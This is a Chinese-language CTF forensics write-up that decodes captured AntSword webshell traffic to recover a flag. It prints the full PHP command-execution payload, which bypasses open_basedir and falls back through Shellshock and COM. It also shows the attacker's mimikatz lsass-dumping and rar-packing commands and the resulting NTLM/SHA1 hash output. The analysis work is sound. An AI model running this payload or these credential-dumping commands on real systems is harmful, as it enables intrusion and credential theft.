image-20230724131019257

流量到手先过滤http

而后追踪TCP流

image-20230724131104815

这种带有ini_set的一眼蚁剑流量

image-20230724131201646

image-20230724131223957

url解码,格式化之后重点分析执行了什么命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split("/;|:/", $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        };
        $tmdir = $item . "/.c46a89a";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
            continue;
        }
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        };
        @ini_set("open_basedir", "/");
        @rmdir($tmdir);
        break;
    };
};;
function asenc($out)
{
    return $out;
}

;
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "79c2" . "0b92";
    echo @asenc($output);
    echo "b4e7e" . "465b62";
}

ob_start();
try {
    $p = base64_decode(substr($_POST["yee092cda97a62"], 2));
    $s = base64_decode(substr($_POST["q8fb9d4c082c11"], 2));
    $envstr = @base64_decode(substr($_POST["p48a6d55fac1b1"], 2));
    $d = dirname($_SERVER["SCRIPT_FILENAME"]);
    $c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\"";
    if (substr($d, 0, 1) == "/") {
        @putenv("PATH=" . getenv("PATH") . ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
    } else {
        @putenv("PATH=" . getenv("PATH") . ";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
    }
    if (!empty($envstr)) {
        $envarr = explode("|||asline|||", $envstr);
        foreach ($envarr as $v) {
            if (!empty($v)) {
                @putenv(str_replace("|||askey|||", "=", $v));
            }
        }
    }
    $r = "{$p} {$c}";
    function fe($f)
    {
        $d = explode(",", @ini_get("disable_functions"));
        if (empty($d)) {
            $d = array();
        } else {
            $d = array_map('trim', array_map('strtolower', $d));
        }
        return (function_exists($f) && is_callable($f) && !in_array($f, $d));
    }

    ;
    function runshellshock($d, $c)
    {
        if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
            if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                $tmp = tempnam(sys_get_temp_dir(), 'as');
                putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
                if (fe('error_log')) {
                    error_log("a", 1);
                } else {
                    mail("[email protected]", "", "", "-bv");
                }
            } else {
                return False;
            }
            $output = @file_get_contents($tmp);
            @unlink($tmp);
            if ($output != "") {
                print($output);
                return True;
            }
        }
        return False;
    }

    ;
    function runcmd($c)
    {
        $ret = 0;
        $d = dirname($_SERVER["SCRIPT_FILENAME"]);
        if (fe('system')) {
            @system($c, $ret);
        } elseif (fe('passthru')) {
            @passthru($c, $ret);
        } elseif (fe('shell_exec')) {
            print(@shell_exec($c));
        } elseif (fe('exec')) {
            @exec($c, $o, $ret);
            print(join("
", $o));
        } elseif (fe('popen')) {
            $fp = @popen($c, 'r');
            while (!@feof($fp)) {
                print(@fgets($fp, 2048));
            }
            @pclose($fp);
        } elseif (fe('proc_open')) {
            $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
            while (!@feof($io[1])) {
                print(@fgets($io[1], 2048));
            }
            while (!@feof($io[2])) {
                print(@fgets($io[2], 2048));
            }
            @fclose($io[1]);
            @fclose($io[2]);
            @proc_close($p);
        } elseif (fe('antsystem')) {
            @antsystem($c);
        } elseif (runshellshock($d, $c)) {
            return $ret;
        } elseif (substr($d, 0, 1) != "/" && @class_exists("COM")) {
            $w = new COM('WScript.shell');
            $e = $w->exec($c);
            $so = $e->StdOut();
            $ret .= $so->ReadAll();
            $se = $e->StdErr();
            $ret .= $se->ReadAll();
            print($ret);
        } else {
            $ret = 127;
        }
        return $ret;
    }

    ;
    $ret = @runcmd($r . " 2>&1");
    print ($ret != 0) ? "ret={$ret}" : "";;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
&
p48a6d55fac1b1 = 3G & q8fb9d4c082c11 = 8mY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1ciJndob2FtaSAvcHJpdiZlY2hvIGVmYTkyM2JhNTA0JmNkJmVjaG8gMWE0YmU4ODE1ZWY4 & yee092cda97a62 = yqY21k
1
2
3
$p = base64_decode(substr($_POST["yee092cda97a62"], 2));
$s = base64_decode(substr($_POST["q8fb9d4c082c11"], 2));
$envstr = @base64_decode(substr($_POST["p48a6d55fac1b1"], 2));

这段代码中可以看到先对字符串进行截取操作,再base64解码,前两位都是混淆用的

1
p48a6d55fac1b1 = 3G & q8fb9d4c082c11 = 8mY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1ciJndob2FtaSAvcHJpdiZlY2hvIGVmYTkyM2JhNTA0JmNkJmVjaG8gMWE0YmU4ODE1ZWY4 & yee092cda97a62 = yqY21k

image-20230724131502828

image-20230724131516374

之后的流量都这么分析

1
2
3
cd /d "c:\\Windows\\Temp"&mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" > 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&dir&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&rar.exe a -PSecretsPassw0rds 1.rar 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8

这里可以看到1.rar的密码是SecretsPassw0rds,里面有mimikatz抓出来的东西

image-20230724131910410

image-20230724131926429

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
  .#####.   mimikatz 2.2.0 (x64) #19041 Jul 29 2021 11:16:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz(commandline) # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : PDC$
Domain            : TEST
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:24
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : PDC$
	 * Domain   : TEST
	 * NTLM     : 416f89c3a5deb1d398a1a1fce93862a7
	 * SHA1     : 54896b6f5e60e9be2b46332b13d0e0f110d6518f
	tspkg :	
	wdigest :	
	 * Username : PDC$
	 * Domain   : TEST
	 * Password : (null)
	kerberos :	
	 * Username : pdc$
	 * Domain   : test.local
	 * Password : 15 e0 7e 07 d9 9d 3d 42 45 40 38 ec 97 d6 25 59 c9 e8 05 d9 fa bd 81 f9 2e 05 67 84 e1 a3 a3 ec eb 65 ba 6e b9 60 9b dd 5a 74 4b 2e 07 68 94 fd a1 cb 2e 7b a2 13 07 31 34 c2 1d e8 95 53 43 38 61 91 53 2b c4 b0 3e ea 7a ac 03 60 1f bf e8 dc 00 c5 fe 13 ed 7a ca 88 32 fc d0 c6 ea d2 c7 b4 87 31 82 dd 4c 96 4f 23 80 39 2e 31 b0 cf 67 8e 63 b2 5e f9 77 32 44 05 8e 22 f9 0c 69 32 64 1b b8 2d a0 99 0e b8 0e 2c 10 b6 ff 6d 5f 11 c9 5e 46 eb 62 df 00 7a bd c6 7b 83 db 0f 58 ed ac a3 66 dd c2 ec df 9f 22 b3 34 0d 07 89 ea 3b 2b b1 e1 f9 e2 e5 85 cd a3 78 ae dd e3 98 78 39 8e 4f 49 5a b6 05 4c 6d 1a e6 fa 30 c7 c6 fb 4d dc b4 ca f6 3c 20 fe 70 eb e3 16 82 78 f8 49 8d 15 6a 15 10 ac d8 68 f8 ef ad 0c c2 39 f2 ca 80 ef 96 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:24
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 70157 (00000000:0001120d)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:24
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : PDC$
	 * Domain   : TEST
	 * NTLM     : 416f89c3a5deb1d398a1a1fce93862a7
	 * SHA1     : 54896b6f5e60e9be2b46332b13d0e0f110d6518f
	tspkg :	
	wdigest :	
	 * Username : PDC$
	 * Domain   : TEST
	 * Password : (null)
	kerberos :	
	 * Username : PDC$
	 * Domain   : test.local
	 * Password : 15 e0 7e 07 d9 9d 3d 42 45 40 38 ec 97 d6 25 59 c9 e8 05 d9 fa bd 81 f9 2e 05 67 84 e1 a3 a3 ec eb 65 ba 6e b9 60 9b dd 5a 74 4b 2e 07 68 94 fd a1 cb 2e 7b a2 13 07 31 34 c2 1d e8 95 53 43 38 61 91 53 2b c4 b0 3e ea 7a ac 03 60 1f bf e8 dc 00 c5 fe 13 ed 7a ca 88 32 fc d0 c6 ea d2 c7 b4 87 31 82 dd 4c 96 4f 23 80 39 2e 31 b0 cf 67 8e 63 b2 5e f9 77 32 44 05 8e 22 f9 0c 69 32 64 1b b8 2d a0 99 0e b8 0e 2c 10 b6 ff 6d 5f 11 c9 5e 46 eb 62 df 00 7a bd c6 7b 83 db 0f 58 ed ac a3 66 dd c2 ec df 9f 22 b3 34 0d 07 89 ea 3b 2b b1 e1 f9 e2 e5 85 cd a3 78 ae dd e3 98 78 39 8e 4f 49 5a b6 05 4c 6d 1a e6 fa 30 c7 c6 fb 4d dc b4 ca f6 3c 20 fe 70 eb e3 16 82 78 f8 49 8d 15 6a 15 10 ac d8 68 f8 ef ad 0c c2 39 f2 ca 80 ef 96 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 267962 (00000000:000416ba)
Session           : Interactive from 1
User Name         : administrator
Domain            : TEST
Logon Server      : PDC
Logon Time        : 2022/4/15 22:28:02
SID               : S-1-5-21-3633886114-1307863022-927341053-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : TEST
	 * NTLM     : a85016dddda9fe5a980272af8f54f20e
	 * SHA1     : 6f5f2ed7cc12564ac756917b3ee54d5396bed5ad
	 [00010000] CredentialKeys
	 * NTLM     : a85016dddda9fe5a980272af8f54f20e
	 * SHA1     : 6f5f2ed7cc12564ac756917b3ee54d5396bed5ad
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : TEST
	 * Password : (null)
	kerberos :	
	 * Username : administrator
	 * Domain   : TEST.LOCAL
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 70375 (00000000:000112e7)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:24
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : PDC$
	 * Domain   : TEST
	 * NTLM     : 416f89c3a5deb1d398a1a1fce93862a7
	 * SHA1     : 54896b6f5e60e9be2b46332b13d0e0f110d6518f
	tspkg :	
	wdigest :	
	 * Username : PDC$
	 * Domain   : TEST
	 * Password : (null)
	kerberos :	
	 * Username : PDC$
	 * Domain   : test.local
	 * Password : 15 e0 7e 07 d9 9d 3d 42 45 40 38 ec 97 d6 25 59 c9 e8 05 d9 fa bd 81 f9 2e 05 67 84 e1 a3 a3 ec eb 65 ba 6e b9 60 9b dd 5a 74 4b 2e 07 68 94 fd a1 cb 2e 7b a2 13 07 31 34 c2 1d e8 95 53 43 38 61 91 53 2b c4 b0 3e ea 7a ac 03 60 1f bf e8 dc 00 c5 fe 13 ed 7a ca 88 32 fc d0 c6 ea d2 c7 b4 87 31 82 dd 4c 96 4f 23 80 39 2e 31 b0 cf 67 8e 63 b2 5e f9 77 32 44 05 8e 22 f9 0c 69 32 64 1b b8 2d a0 99 0e b8 0e 2c 10 b6 ff 6d 5f 11 c9 5e 46 eb 62 df 00 7a bd c6 7b 83 db 0f 58 ed ac a3 66 dd c2 ec df 9f 22 b3 34 0d 07 89 ea 3b 2b b1 e1 f9 e2 e5 85 cd a3 78 ae dd e3 98 78 39 8e 4f 49 5a b6 05 4c 6d 1a e6 fa 30 c7 c6 fb 4d dc b4 ca f6 3c 20 fe 70 eb e3 16 82 78 f8 49 8d 15 6a 15 10 ac d8 68 f8 ef ad 0c c2 39 f2 ca 80 ef 96 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 46127 (00000000:0000b42f)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:21
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : PDC$
	 * Domain   : TEST
	 * NTLM     : 416f89c3a5deb1d398a1a1fce93862a7
	 * SHA1     : 54896b6f5e60e9be2b46332b13d0e0f110d6518f
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	KO
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : PDC$
Domain            : TEST
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:21
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : PDC$
	 * Domain   : TEST
	 * Password : (null)
	kerberos :	
	 * Username : pdc$
	 * Domain   : TEST.LOCAL
	 * Password : (null)
	ssp :	KO
	credman :	

mimikatz(commandline) # exit
Bye!

416f89c3a5deb1d398a1a1fce93862a7即为flag